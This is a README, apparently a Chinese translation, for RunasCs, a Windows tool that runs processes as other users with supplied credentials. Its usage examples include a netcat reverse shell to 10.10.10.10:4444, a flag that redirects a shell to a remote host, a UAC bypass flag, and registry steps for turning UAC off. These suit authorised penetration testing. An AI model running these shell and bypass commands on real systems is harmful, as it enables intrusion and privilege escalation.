antonioCoco/RunasCs

### RunasCs *RunasCs* 是一个实用工具，用于通过显式凭据以不同于用户当前登录权限的权限运行特定进程。 该工具是 Windows 内置 *runas.exe* 的改进开源版本，解决了一些限制： * 允许使用显式凭据 * 无论是从交互式进程还是服务进程生成，均能正常工作 * 正确管理 *Window Stations* 和 *Desktop* 的 *DACL*，以便创建新进程 * 如果调用进程持有所需的权限（自动检测），则使用更可靠的创建进程函数，如 ``CreateProcessAsUser()`` 和 ``CreateProcessWithTokenW()`` * 允许指定登录类型，例如 8-NetworkCleartext 登录（无 *UAC* 限制） * 当已知管理员密码时，允许绕过 UAC（标志 --bypass-uac） * 允许创建一个进程，其主线程模拟请求的用户（标志 --remote-impersonation） * 允许将 *stdin*、*stdout* 和 *stderr* 重定向到远程主机 * 它是开源的 :) *RunasCs* 具有自动检测功能，可确定适用于各种上下文的最佳创建进程函数。 根据进程调用者令牌的权限，它将按以下优先顺序使用其中一种创建进程函数： 1. ``CreateProcessAsUserW()`` 2. ``CreateProcessWithTokenW()`` 3. ``CreateProcessWithLogonW()`` ### 系统要求 .NET Framework >= 2.0 ### 用法 ``` RunasCs v1.5 - @splinter_code Usage: RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--force-profile] [--bypass-uac] [--remote-impersonation] Description: RunasCs is an utility to run specific processes under a different user account by specifying explicit credentials. In contrast to the default runas.exe command it supports different logon types and CreateProcess* functions to be used, depending on your current permissions. Furthermore it allows input/output redirection (even to remote hosts) and you can specify the password directly on the command line. Positional arguments: username username of the user password password of the user cmd commandline for the process Optional arguments: -d, --domain domain domain of the user, if in a domain. Default: "" -f, --function create_process_function CreateProcess function to use. When not specified RunasCs determines an appropriate CreateProcess function automatically according to your privileges. 0 - CreateProcessAsUserW 1 - CreateProcessWithTokenW 2 - CreateProcessWithLogonW -l, --logon-type logon_type the logon type for the token of the new process. Default: "2" - Interactive -t, --timeout process_timeout the waiting time (in ms) for the created process. This will halt RunasCs until the spawned process ends and sent the output back to the caller. If you set 0 no output will be retrieved and a background process will be created. Default: "120000" -r, --remote host:port redirect stdin, stdout and stderr to a remote host. Using this option sets the process_timeout to 0. -p, --force-profile force the creation of the user profile on the machine. This will ensure the process will have the environment variables correctly set. WARNING: If non-existent, it creates the user profile directory in the C:\Users folder. -b, --bypass-uac try a UAC bypass to spawn a process without token limitations (not filtered). -i, --remote-impersonation spawn a new process and assign the token of the logged on user to the main thread. Examples: Run a command as a local user RunasCs.exe user1 password1 "cmd /c whoami /all" Run a command as a domain user and logon type as NetworkCleartext (8) RunasCs.exe user1 password1 "cmd /c whoami /all" -d domain -l 8 Run a background process as a local user, RunasCs.exe user1 password1 "C:\tmp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t 0 Redirect stdin, stdout and stderr of the specified command to a remote host RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444 Run a command simulating the /netonly flag of runas.exe RunasCs.exe user1 password1 "cmd /c whoami /all" -l 9 Run a command as an Administrator bypassing UAC RunasCs.exe adm1 password1 "cmd /c whoami /priv" --bypass-uac Run a command as an Administrator through remote impersonation RunasCs.exe adm1 password1 "cmd /c echo admin > C:\Windows\admin" -l 8 --remote-impersonation ``` 这两个进程（调用进程和被调用进程）将通过一个 *pipe* 进行通信（用于 *stdout* 和 *stderr*）。 默认登录类型为 2（*Interactive*）。 默认情况下，*Interactive* (2) 登录类型受到 *UAC* 的限制，并且从这些身份验证生成的令牌会被过滤。 您可以通过将以下注册表键值设置为 0 并重新启动服务器，来进行不受任何限制的交互式登录： ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ``` 否则，您可以尝试使用 **--bypass-uac** 标志来尝试绕过令牌过滤限制。 **NetworkCleartext (8)** 登录类型是权限最广的一种，因为它在本地令牌中不会被 UAC 过滤，并且由于将凭据存储在身份验证包中，仍然允许通过网络进行身份验证。如果您持有足够的权限，请尝试始终通过标志 --logon-type 8 指定此登录类型。 默认情况下，调用进程（*RunasCs*）将等待生成的进程执行结束。 如果您需要生成后台或异步进程，即生成反向 shell，您需要将参数 ``-t timeout`` 设置为 ``0``。在这种情况下，*RunasCs* 不会等待新生成的进程执行结束。 ### 参考资料 * [Potatoes and tokens](https://decoder.cloud/2018/01/13/potato-and-tokens/) * [Starting an Interactive Client Process in C++](https://docs.microsoft.com/en-us/previous-versions/aa379608(v=vs.85)) * [Creating a Child Process with Redirected Input and Output](https://learn.microsoft.com/en-us/windows/win32/procthread/creating-a-child-process-with-redirected-input-and-output) * [Interactive Services](https://learn.microsoft.com/en-us/windows/win32/services/interactive-services) * [What is up with "The application failed to initialize properly (0xc0000142)" error?](https://blogs.msdn.microsoft.com/winsdk/2015/06/03/what-is-up-with-the-application-failed-to-initialize-properly-0xc0000142-error/) * [Getting an Interactive Service Account Shell](https://www.tiraniddo.dev/2020/02/getting-interactive-service-account.html) * [Reading Your Way Around UAC (Part 1)](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-1.html) * [Reading Your Way Around UAC (Part 2)](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-2.html) * [Reading Your Way Around UAC (Part 3)](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-3.html) * [Vanara - A set of .NET libraries for Windows implementing PInvoke calls to many native Windows APIs with supporting wrappers](https://github.com/dahall/Vanara) ### 致谢 * [@decoder](https://github.com/decoder-it) * [@qtc-de](https://github.com/qtc-de) * [@winlogon0](https://twitter.com/winlogon0)

标签：Conpot, CreateProcessAsUser, CSharp, CTF学习, Runas替代, UAC绕过, Windows安全, 二进制发布, 内网渗透, 凭证利用, 协议分析, 开源工具, 服务提权, 权限提升, 模拟令牌, 横向移动, 端点可见性, 编程规范, 进程创建